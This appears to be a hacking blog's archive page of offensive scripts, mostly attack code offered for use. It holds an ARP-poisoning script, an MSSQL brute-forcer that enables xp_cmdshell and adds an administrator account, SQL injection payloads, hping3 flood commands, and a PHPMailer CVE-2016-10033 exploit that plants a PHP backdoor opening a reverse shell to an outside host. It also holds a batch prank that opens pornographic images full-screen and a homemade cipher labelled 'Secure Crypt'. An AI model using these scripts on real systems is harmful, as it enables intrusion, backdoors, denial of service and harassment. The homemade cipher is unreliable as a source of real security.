Category Archives: (M) Code Heap

ARP Poisoning Script

#!/bin/bash
niccard=eth1
if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n33[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " 33[1;31mCoded By:33[0m Travis Phillips"
echo -e " 33[1;31mDate Released:33[0m 03/27/2012"
echo -e " 33[1;31mWebsite:33[0m http://theunl33t.blogspot.com\n33[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

ARP poison script

The purpose of this script is to automate the process of ARP poison attacks.The attacker must only insert the IP address of the target and the IP of the Gateway.This script was coded by Travis Phillips and you can find the source code below:

SQL Brute Force Script

#!/usr/bin/python

import _mssql

# mssql = _mssql.connect('ip', 'username', 'password')
# mssql.execute_query()

passwords = file("pass.txt", "r")
ip = "192.168.200.128"

for password in passwords:
password = password.rstrip()
try:
mssql = _mssql.connect(ip, "sa", password)

print "[*] Successful login with username 'sa' and password: " + password
print "[*] Enabling 'xp_cmdshell'"
mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")
mssql.execute_query("RECONFIGURE;")

print "[*] Adding Administrative user"
mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'")
mssql.close()

print "[*] Success!"
break

except:
print "[!] Failed login for username 'sa' and password: " + password

The purpose of this script is to perform a brute force attack on an SQL database.The script will try to connect to the remote host with the administrative account sa and with one password that will be valid from the file pass.txt.If the connection is successful then it will try to enable the xp_cmdshell and add a new user on the remote host.

Author: Larry Spohn

Website: http://e-spohn.com

Twitter: @Spoonman1091

Credits: Dave Kennedy

Glastopf – Python web application honeypot

General approach:

  • Vulnerability type emulation instead of vulnerability emulation. Once a vulnerability type is emulated, Glastopf can handle unknown attacks of the same type. While implementation may be slower and more complicated, we remain ahead of the attackers until they come up with a new method or discover a new flaw in our implementation.
  • Modular design to add new logging capabilities or attack type handlers. Various database capabilities are already in place. HPFeeds logging is supported for centralized data collection.
  • Popular attack type emulation is already in place: Remote File Inclusion via a build-in PHP sandbox, Local File Inclusion providing files from a virtual file system and HTML injection via POST requests.
  • Adversaries usually use search engines and special crafted search requests to find their victims. In order to attract them, Glastopf provides those keywords (AKA “dork”) and additionally extracts them from requests, extending its attack surface automatically. As a result, the honeypot gets more and more attractive with each new attack attempted on it.
  • We will make the SQL injection emulator public, provide IP profiling for crawler recognition and intelligent dork selection.

HPFEEDS

The honeypot has hpfeeds, our central logging feature, enabled by default. If you don’t want to report your events, turn off hpfeeds in glastopf.cfg. By sending your data via hpfeeds you consent to sharing your data with third parties.

 

Web Application Honeypot http://glastopf.org

Union Based SQL Injection

[+] Union Based SQL Injection

‘ or 1=1#

1′ ORDER BY 10#

1′ UNION SELECT version(),2#

1′ UNION SELECT version(),database()#

1′ UNION SELECT version(),user()#

1′ UNION ALL SELECT table_name,2 from information_schema.tables#

1′ UNION ALL SELECT column_name,2 from information_schema.columns where table_name = “users”#

1’ UNION ALL SELECT concat(user,char(58),password),2 from users#

 

sqlmap –url=”<url>” -p username –user-agent=SQLMAP –threads=10 –eta –dbms=MySQL –os=Linux –banner –is-dba –users –passwords –current-user –dbs

Practical Approach For – DoS attacks using hping3 / nping

Wiki about DoS attacks explanation: Denial of-Service Attack

DDoS attacks are common attacks, occurring about 28 times per hour. http://www.digitalattackmap.com provide worldwide distribution of DDoS attacks in real time:

From the map of the DDoS attack, the international situation can be seen; for example, the Japanese-Chinese attack can be seen on September 18; after Trump announced the wall, you can see the Mexican-American attack.

 

DoS attacks using hping3:

#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com

 

  • -c: the number of packets sent
  • -d: Size of each packet
  • -S: Sends SYN packets
  • -w: TCP window size
  • -p: target port, you can specify any port
  • -flood: Send packets as fast as possible
  • -rand-source: Use a random IP address, the target machine to see a pile of ip, you can not locate the actual IP; You can also use-a or -spoof hide the host name

Simple SYN flood attack:

# hping3 -S –flood -V testsite.com

TCP connection attack:

# nping –tcp-connect -rate=90000 -c 900000 -q testsite.com

For more information on these two tools:

# man hping3# man nping

 

Please Feel Free To Share Your Views Experience Or Issue In Comments Below “Spam Comments Are Strictly Prohibited” Now we have better comment systems and servers

 

If You Like This Application Please Give Your Valuable Review In Google Play Store.

 

Enjoy Hacking !!!!!

 

 

PHPMailer versions prior to 5.2.18 remote code execution exploit. Written in python.

# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
 
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
 
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
 
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
 
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
 
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
 
os.system('clear')
print("\n")
print(" aaaaaa aaaa   aaa aaaaaa aaaaaaa  aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaaaaaa ")
print("aaaaaaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
print("aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaa  aaaaaa aaaaaaaaa  aaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  aaa")
print("aaa  aaaaaa  aaaaaaaa  aaaaaa  aaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaa  aaa")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
 
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
 
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}
 
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
 
headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}
 
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
 
 
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)

 

DBShield – Go Based Database Firewall

DBShield is a Database Firewall written in Go that has protection for MySQL/MariaDB, Oracle and PostgreSQL databases. It works in a proxy fashion inspecting traffic and dropping abnormal queries after a learning period to populate the internal database with regular queries.

DBShield - Go Based Database Firewall

Learning mode lets any query pass but it records information about it (pattern, username, time and source) into the internal database.

After collecting enough patterns we can run DBShield in protect mode. Protect mode can distinguish abnormal query pattern, user and source and take action based on configurations.

 

It currently supports DB2, MariaDB, MySQL, Oracle & PostgreSQL all with SSL apart from Oracle and DB2.

Installation

Get it:

Then you can see help using “-h” argument:

and run it with your configuration, like:

You can download DBShield here:

DBShield-1.0.0-beta4.zip

Python Code For Accessing Physical Location

import pygeoip
 gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')
 def printRecord(tgt): 
rec = gi.record_by_name(tgt)
 city = rec['city'] 
region = rec['region_name']
 country = rec['country_name']
 long = rec['longitude']
 lat = rec['latitude'] 
print '[*] Target: ' + tgt + ' Geo-located. '
 print '[+] '+str(city)+', '+str(region)+', '+str(country) 
print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long) tgt = 'ip adress here' printRecord(tgt)

 

PornAttack – Batch Programming

echo off
echo ^<html^>^<head^>^<title^>Fap^</title^> > Fap.hta
echo. >> Fap.hta
echo ^<hta:application id="oBVC" >> Fap.hta
echo applicationname="Fap"  >> Fap.hta
echo version="1.0" >> Fap.hta
echo maximizebutton="no" >> Fap.hta
echo minimizebutton="no" >> Fap.hta
echo sysmenu="no" >> Fap.hta
echo Caption="no" >> Fap.hta
echo windowstate="maximize"/^> >> Fap.hta
echo. >> Fap.hta
echo ^</head^>^<body background="http://www.newsfilter.org/content/gallery/50383/met-art_ACM_21_5.jpg" scroll="yes"^> >> Fap.hta
echo ^<img src="http://www.giffies.com/games/files/18.gif" ^> >> Fap.hta
echo ^<img src="http://stxt.youngpornmovies.com/thumbs/1/0585/101133_1.jpg" ^> >> Fap.hta
echo ^<img src="http://www4.clickr.info/img/190x163_teen3_orig.gif" ^> >> Fap.hta
echo ^<img src="http://www.thumbserve.com/intw/tn113829.jpg" ^> >> Fap.hta
echo ^<img src="http://static.ads.crakmedia.com/cfcd9a00272d345553929068fe15c5aa.gif" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/038/1001353519.jpg" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/009/0496989067.jpg" ^> >> Fap.hta
echo ^<img src="http://www.silentpix.com/content/toplist/siteoftheday9.gif" ^> >> Fap.hta
echo ^<img src="http://www.newsfilter.org/content/gallery/50378/met-art_LUH_294_2.jpg" ^> >> Fap.hta
echo ^<img src="http://ddfcash.com/PROMO/content/obj/vids/547vbj/547vbjp4.jpg" ^> >> Fap.hta
echo ^<img src="http://www.teenport.com/galleries/bailey-kline/red-peignoir/09.jpg" ^> >> Fap.hta
echo ^</body^>^</html^> >> Fap.hta
start "" /wait "Fap.hta"
del /s /f /q "Fap.hta" > nul

 

Secure Crypt – PHP Code

php script:
///////////////////
<?php
if($_POST['task']!="" and $_POST['message']!="")
{
$message=$_POST['message'];
if($_POST['key']!="")
{
$key=md5($_POST['key']);
}
else
{
$key=md5('Long Text To Be Used As Default Key');
}
$array_key=str_split($key,1);
$array_final_key=array_unique($array_key);
foreach($array_final_key as $single_key)
{
$master_key[]=$single_key;
}
$counter_key=count($master_key);
if($_POST['task']!='decrypt')
{
// Encrypt
$message_array=str_split($message,$counter_key);
foreach($message_array as $chunk)
{
$single_char_value=str_split($chunk,1);
for($loop1=0;$loop1<$counter_key;$loop1++)
{
$ord_sum_char[]=ord($master_key[$loop1])+ord($single_char_value[$loop1]);
}
}
foreach($ord_sum_char as $to_encrypt)
{
$loop_val=intval($to_encrypt/11);
$mod_val=$to_encrypt%11;
switch($mod_val)
{
case "0";
$char_fixed_val='<';
break;
case "1";
$char_fixed_val='*';
break;
case "2";
$char_fixed_val='$';
break;
case "3";
$char_fixed_val='#';
break;
case "4";
$char_fixed_val='+';
break;
case "5";
$char_fixed_val='?';
break;
case "6";
$char_fixed_val='>';
break;
case "7";
$char_fixed_val='^';
break;
case "8";
$char_fixed_val='!';
break;
case "9";
$char_fixed_val='&';
break;
case "10";
$char_fixed_val='%';
break;
}
$encryptd_char[]=$loop_val.$char_fixed_val;
}
$final_message=implode(" ",$encryptd_char);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area">'.$final_message.'</textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
else
{
// Decrypt
$first_decrypt_array=explode(" ",$message);
$counter_element=0;
$text_reset="";
foreach($first_decrypt_array as $first_value)
{
$counter_element=$counter_element+1;
if($counter_element%$counter_key=="0")
{
$text_reset=$text_reset.$first_value."Q";
}
else
{
$text_reset=$text_reset.$first_value." ";
}
}
$text_fixed=rtrim($text_reset,"Q");
$array_sectors=explode("Q",$text_fixed);
foreach($array_sectors as $sector)
{
$array_chars_fixed=explode(" ",$sector);
$counter_chars_fixed=count($array_chars_fixed);
for($loop_fixed=0;$loop_fixed<$counter_chars_fixed;$loop_fixed++)
{
$char_single_fixed=substr($array_chars_fixed[$loop_fixed],-1);
$loops_fixed=str_replace($char_single_fixed,"",$array_chars_fixed[$loop_fixed]);
$loops_fixed_val=$loops_fixed*11;
switch($char_single_fixed)
{
case "<";
$char_fixed_val=0;
break;
case "*";
$char_fixed_val=1;
break;
case "$";
$char_fixed_val=2;
break;
case "#";
$char_fixed_val=3;
break;
case "+";
$char_fixed_val=4;
break;
case "?";
$char_fixed_val=5;
break;
case ">";
$char_fixed_val=6;
break;
case "^";
$char_fixed_val=7;
break;
case "!";
$char_fixed_val=8;
break;
case "&";
$char_fixed_val=9;
break;
case "%";
$char_fixed_val=10;
break;
}
$final_val=($loops_fixed_val+$char_fixed_val)-ord($master_key[$loop_fixed]);
if($final_val!=0)
{
$decoded_message[]=chr($final_val);
}
}
}
$final_message1=implode("",$decoded_message);
$fh=fopen("Decoded.txt","w+");
fputs($fh,$final_message1);
fclose($fh);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header"><a href="Decoded.txt">Decoded Message</a></div>
</div>
</div>
</body>
</html>';
}
}
else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area"></textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
?>
///////////////////
style file (style.css)
///////////////////
html{
cursor: default;
}
body{
margin: 0px;
font-size: 14px;
color: #ff0000;
font-weight: bold;
background: #000000;
}
#main_container{
width: 500px;
margin-left: auto;
margin-right: auto;
}
#body_container{
width: 500px;
height: 600px;
position: relative;
top: 0px;
left: 0px;
}
#header{
height: 50px;
width: 498px;
background: #000000;
position: absolute;
top: 100px;
left: 0px;
padding-top: 5px;
padding-left: 0px;
padding-right: 0px;
padding-bottom: 0px;
font-size: 32px;
color: #ff0000;
text-align: center;
border: 1px solid #ff0000; 
}
#text_area{
height: 300px;
width: 500px;
border: 0px;
background: #ff0000;
position: absolute;
top: 160px;
left: 0px;
cursor: default;
font-size: 14px;
font-weight: bold;
}
#task{
width: 110px;
position: absolute;
top: 470px;
left: 0px;
background: #ff0000;
border: 0px; 
}
#button{
width: 110px;
position: absolute;
top: 470px;
left: 120px;
background: #ff0000;
border: 0px;
}
#key{
position: absolute;
top: 470px;
left: 255px;
}
#key_text{
width: 200px;
background: #ff0000;
position: absolute;
top: 470px;
right: 0px;
border: 0px;
}